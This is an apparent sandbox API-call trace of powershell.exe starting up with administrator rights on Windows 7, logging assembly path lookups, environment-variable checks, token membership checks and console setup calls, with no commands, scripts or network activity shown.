	[0409.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0409.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0410.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0410.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0410.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0410.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0412.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0412.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0412.178] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0412.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0412.178] CoTaskMemFree (pv=0x290840) 
	[0412.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0412.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0412.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0412.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0412.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x18db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0412.945] SetErrorMode (uMode=0x1) returned 0x1
	[0412.945] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x18dd80 | out: lpFileInformation=0x18dd80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0412.946] SetErrorMode (uMode=0x1) returned 0x1
	[0414.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0414.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0414.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0414.153] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0414.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.153] CoTaskMemFree (pv=0x290840) 
	[0414.156] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0414.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.156] CoTaskMemFree (pv=0x290840) 
	[0414.156] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0414.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.156] CoTaskMemFree (pv=0x290840) 
	[0414.159] CoCreateGuid (in: pguid=0x18e148 | out: pguid=0x18e148*(Data1=0xdad20506, Data2=0x10e9, Data3=0x4096, Data4=([0]=0xb5, [1]=0xf2, [2]=0x42, [3]=0x45, [4]=0x6d, [5]=0x6, [6]=0xde, [7]=0x50))) returned 0x0
	[0414.162] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0414.162] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.162] CoTaskMemFree (pv=0x290840) 
	[0414.165] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0414.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.165] CoTaskMemFree (pv=0x290840) 
	[0414.435] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0414.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.435] CoTaskMemFree (pv=0x290840) 
	[0414.443] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0414.444] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x18ddf0 | out: lpConsoleScreenBufferInfo=0x18ddf0) returned 1
	[0414.451] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0414.451] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x18ddf0 | out: lpConsoleScreenBufferInfo=0x18ddf0) returned 1
	[0414.452] GetVersionExW (in: lpVersionInformation=0x18dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0414.455] GetCurrentProcess () returned 0xffffffffffffffff
	[0414.456] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18de18 | out: TokenHandle=0x18de18*=0x314) returned 1
	[0414.460] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18dd38 | out: TokenInformation=0x0, ReturnLength=0x18dd38) returned 0
	[0414.461] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1f7290
	[0414.461] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x1f7290, TokenInformationLength=0x4, ReturnLength=0x18dd38 | out: TokenInformation=0x1f7290, ReturnLength=0x18dd38) returned 1
	[0414.461] DuplicateTokenEx (in: hExistingToken=0x314, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x18de98 | out: phNewToken=0x18de98*=0x310) returned 1
	[0414.462] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18dd38 | out: TokenInformation=0x0, ReturnLength=0x18dd38) returned 0
	[0414.462] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1f72c0
	[0414.462] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x1f72c0, TokenInformationLength=0x4, ReturnLength=0x18dd38 | out: TokenInformation=0x1f72c0, ReturnLength=0x18dd38) returned 1
	[0414.462] CheckTokenMembership (in: TokenHandle=0x310, SidToCheck=0x2d96be0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18dea8 | out: IsMember=0x18dea8) returned 1
	[0414.462] CloseHandle (hObject=0x310) returned 1
	[0414.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0414.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0414.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0414.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0414.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0414.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0414.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0414.824] CoTaskMemAlloc (cb=0x804) returned 0x1b3472b0
	[0414.824] GetConsoleTitleW (in: lpConsoleTitle=0x1b3472b0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0414.824] CoTaskMemFree (pv=0x1b3472b0) 
	[0415.237] CoTaskMemAlloc (cb=0x804) returned 0x1b3480a0
	[0415.238] GetConsoleTitleW (in: lpConsoleTitle=0x1b3480a0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0415.238] CoTaskMemFree (pv=0x1b3480a0) 
	[0415.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0415.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0415.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0415.240] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0416.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0416.803] SetConsoleCtrlHandler (HandlerRoutine=0x27a68dc, Add=1) returned 1
	[0416.827] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0416.829] CoCreateGuid (in: pguid=0x18df90 | out: pguid=0x18df90*(Data1=0x6d1f13b0, Data2=0xa658, Data3=0x4068, Data4=([0]=0x8a, [1]=0x95, [2]=0xa, [3]=0x98, [4]=0xee, [5]=0xd1, [6]=0xcb, [7]=0x18))) returned 0x0
	[0416.831] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0416.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.831] CoTaskMemFree (pv=0x290840) 
	[0417.211] WinSqmIsOptedIn () returned 0x0
	[0417.212] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.212] CoTaskMemFree (pv=0x290840) 
	[0417.213] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.213] CoTaskMemFree (pv=0x290840) 
	[0417.213] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.213] CoTaskMemFree (pv=0x290840) 
	[0417.214] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
